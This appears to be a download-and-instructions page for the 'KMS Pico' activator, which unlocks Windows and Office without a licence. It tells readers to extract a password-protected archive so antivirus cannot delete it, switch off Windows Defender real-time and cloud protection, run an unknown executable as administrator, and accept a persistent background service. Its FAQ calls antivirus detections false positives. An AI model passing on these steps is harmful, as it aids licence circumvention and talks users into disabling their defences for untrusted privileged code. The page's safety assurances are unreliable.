KMS Pico: Activator for Microsoft Windows and Office products

What is KMS Pico?

KMS Pico is a Key Management Service (KMS) emulator that is used by Microsoft corporations to activate their products through volume licensing. This utility is designed to test and evaluate software in isolated networks where there is no access to a real KMS server.

KMSpico Application Instructions

Step 1: Downloading KMS Pico

Click on the “KMSpico Official Website” button on this page.

You will be taken to the KMS Pico download page from the official website, where you will need to click “Download KMS Pico“. The file is usually saved to the Downloads folder. You will see it at the bottom of the browser window or in the folder you specified.

The file will look like a compressed archive (KMSpico.zip).

 

How to check? Find the file you just downloaded on your computer. It should be in the “Downloads” folder.

Step 2: Unpacking the archive

1. Right-click on the downloaded file.
2. In the menu that appears, select “Extract all…”.
3. A window will appear. There will be a password entry line in it.
4. Enter the password that is specified on the official website (for example, 2025).
5. Click the “Extract” button.
6. A new folder with the same name will appear in the same place where the archive was. Enter it.

Important! You won’t be able to open the archive without a password. The password is a protection against automatic deletion by the antivirus.

Step 3: Temporarily disable Windows protection (the most important step!)

Why is this necessary? Windows Defender (built-in antivirus) will remove our program, mistaking it for a threat. This is a false alarm, but you need to disable protection during the installation process.

1. Click on the Start menu and select “Settings” (the gear icon).
2. Go to “Update & Security” → “Windows Security“.
3. Click on “Virus & Threat Protection“.
4. In the “Virus & Threat Protection Settings” section, click on the “Manage Settings” link.
5. TURN OFF the sliders for the following items: “Real-time protection” and “Cloud-provided protection“
6. The system can request confirmation, if you agree.

Don’t be afraid! You’re only disabling protection for 5 minutes. Once activated, we’ll immediately re-enable it.

Step 4: Running the program as an Administrator

1. Go back to the unpacked folder.
2. Find the file with the name inside KMSELDI.exe (or KMSpico.exe ). It often has an icon in the form of a white square with a red “sphere” inside.
3. Right-click on this file.
4. Select “Run as administrator” from the context menu.
5. To the system’s question, “Do I allow this app to make changes on your device?” click “Yes“.

Step 5: Activation Process

1. After launching, a small program window will open. There will be several buttons in it.
2. You need to find and click on the main large button. It is usually red and has a “play” icon (like a triangle in a player).
3. Click on it ONE TIME.
4. The window may collapse or disappear, which is normal. The program runs in the background.
5. Wait for 1-2 minutes. A black window (command line) may briefly appear at the bottom of the screen, in the right corner, as the activation process is underway. Do not interfere with it.

Step 6: Restart your computer and check the activation

1. After the program has finished running (the window has disappeared), be sure to restart your computer. Just restart it as usual.
2. After turning it on, check the activation:

For Windows:

• Right-click on the Start menu → select “System“.
• Scroll down to the “Activation” section.
• Next to “Windows“, it should say: “Windows activation is complete” with a checkmark icon.

For Microsoft Office:

• Open any Office application (Word, Excel).
• Go to the “File” menu → “Account“.
• Opposite “Product Information” it should be written: “Product activated“.

 

Frequently Asked Questions (FAQ)

1. Question: The activation didn’t work. What should I do?
   Answer: Make sure you run the program as an Administrator and completely disable Windows Defender (including real-time protection).
2. Question: Is it a virus? The antivirus deletes the file.
   Answer: This is a False Positive. Antiviruses define any programs related to activation as undesirable (Riskware, HackTool).
3. Question: Do I need to run the program again?
   Answer: No, KMS Pico installs a service that automatically updates the activation every 180 days.
4. Question: Will this work on Windows 7 / Office 2013?
   Answer: Yes, but for older versions of Office and Windows, you need to look for the corresponding versions of KMS Pico.
